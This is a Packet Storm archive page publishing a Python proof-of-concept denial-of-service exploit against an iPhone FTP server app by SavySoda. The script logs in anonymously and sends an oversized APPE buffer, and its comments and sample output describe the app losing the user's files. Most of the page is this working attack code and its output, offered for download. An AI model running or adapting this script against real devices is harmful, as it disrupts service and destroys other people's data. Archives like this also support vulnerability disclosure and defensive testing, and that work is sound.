exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iPhone - FTP Server (WiFi FTP) Denial Of Service

iPhone - FTP Server (WiFi FTP) Denial Of Service
Posted Feb 25, 2010
Authored by b0telh0

iPhone - FTP Server (WiFi FTP) remote denial of service exploit.

tags | exploit, remote, denial of service
systems | apple, iphone
SHA-256 | 20f5fc853ac2c74665d032592d61e75ce02d1a15d667657d545c02df9f22ef1e

iPhone - FTP Server (WiFi FTP) Denial Of Service

Change Mirror Download
#!/usr/bin/python
#
# Title: iPhone - FTP Server (WiFi FTP) by SavySoda DoS/PoC
# Date: 02-18-2010
# Author: b0telh0
# Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)
# Tested on: iPhone 3G (firmware 3.1.3)


# The server doesn't crash at all, but after exploiting it
# you can't see (list) your files anymore. You must to close the app
# and open it again. Then you'll see that the app starts like it was
# fresh installed and your files are gone.


# root@bt:~# ./free_ftp.py 192.168.1.108
#
# [+] iPhone - FTP Server by SavySoda(WiFi FTP).
# [+] Free version of WiFi FTP with Ad Support.
#
# [+] Connecting...
# [+] 220 Service ready.
#
# [+] Sending username...
# [+] Sending buffer...
# [+] done!

# root@bt:~# ftp 192.168.1.108
# Connected to 192.168.1.108.
# 220 Service ready.
# Name (192.168.1.108:root): anonymous
# 230 User logged in, proceed.
# Remote system type is UNIX.
# Using binary mode to transfer files.
# ftp> ls
# 200 Command okay.
# 450 Requested file action not taken. File unavailable (e.g., file busy).
# ftp> ls
# 421 Service not available, closing control connection.
# ftp> ls
# Not connected.
# ftp> bye


import socket
import sys
import time

crash = "\x41" * 1000

def Usage():
print ("Usage: ./free_ftp.py serv_ip\n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
host = sys.argv[1]
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "\n[+] FTP Server by SavySoda(WiFi FTP)."
print "[+] Free version of WiFi FTP with Ad Support.\n"
print "[+] Connecting..."
s.connect((host, 21))
b=s.recv(1024)
print "[+] " +b
except:
print ("[-] Can't connect to ftp server!\n")
sys.exit(1)
print "[+] Sending username..."
time.sleep(3)
s.send('USER anonymous\r\n')
s.recv(1024)
print "[+] Sending buffer..."
time.sleep(3)
s.send('APPE ' + crash + '\r\n')
s.recv(1024)
s.close()
print "[+] done!\n"
sys.exit(0);
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close